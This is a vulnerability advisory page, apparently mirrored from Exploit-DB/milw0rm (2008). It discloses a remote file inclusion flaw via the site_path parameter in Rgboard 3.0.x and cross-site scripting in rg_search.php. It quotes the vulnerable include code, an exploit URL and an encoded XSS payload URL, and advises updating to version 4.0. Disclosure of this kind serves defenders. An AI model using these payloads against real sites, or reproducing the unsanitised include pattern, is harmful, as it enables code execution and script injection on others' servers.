Rgboard 3.0.x Multiple Vulnerabilities (RFI/XSS)

vendor:

Rgboard

by:

e.wiZz!

7.5

CVSS

HIGH

Remote File Include/XSS

98, 79

CWE

Product Name: Rgboard

Affected Version From: 3.0.0

Affected Version To: 3.0.12

Patch Exists: Yes

Related CWE: N/A

CPE: a:rgboard:rgboard:3.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Rgboard 3.0.x Multiple Vulnerabilities (RFI/XSS)

Rgboard 3.0.x is vulnerable to Remote File Include and XSS. The vulnerable code is located in the file include/bbs.lib.inc.php, line 22. The exploit is to send a malicious URL to the vulnerable parameter site_path. Almost every field is vulnerable to XSS, example rg_search.php.

Mitigation:

Update to the latest version of Rgboard, 4.0.

Source

Exploit-DB raw data:

################################################
#    Rgboard 3.0.x  Multiple Vulnerabilities   #
#                  (RFI/XSS)                   #
################################################

/**/    Author::  e.wiZz!
 
/**/   Site::  www.balcanwarez.com 
 
/**/   Contact:: N/A :D
===========================================================
/**/   Script :: Rgboard
 
/**/   Vulnerable version :: 3.0.0/3.0.12

/**/ Not vulnerable :: 4.0 

/**/   Download :: www.rgboard.com
============================================================
 
[<Remote File Include>]

/**/ Vulnerable code,line 22:
\include\bbs.lib.inc.php

if (!defined(â€™BBS_LIB_INC_INCLUDEDâ€™)) {
define(â€™BBS_LIB_INC_INCLUDEDâ€™, 1);
// *start of include,eh?*

if(!$site_path) $site_path=â€™./â€™;
require_once â€œ{$site_path}include/lib.inc.phpâ€;
//$site_path

/**/  Exploit:

http://www.target.com/include/bbs.lib.inc.php?site_path=evilthingg0ezhere
             

[<XSS>]

/**/  Almost every field is vulnerable to xss,example(rg_search.php):
 
/**/  Live demo:
   http://xxx.com/rgboard/rg_search.php?bbs_id=search&page_no=2&s_text=%22%3E%3Ca+href%3D%22http%3A%2F%2Fbalcanwarez.com%22%3E%3Ch1%3EOvdje nesto bezze upises,boli me kita :D%3C%2Fh1%3E%3C%2Fa%3E        

 
==============================================================
/**/  Thanx : QKrun1x,F34R,aluigi,Nuclear,aluigi,str0ke
 
/**/ PozdraF : deckima s elitesecurity.org i cyber-underground.org
===============================================================

# milw0rm.com [2008-05-14]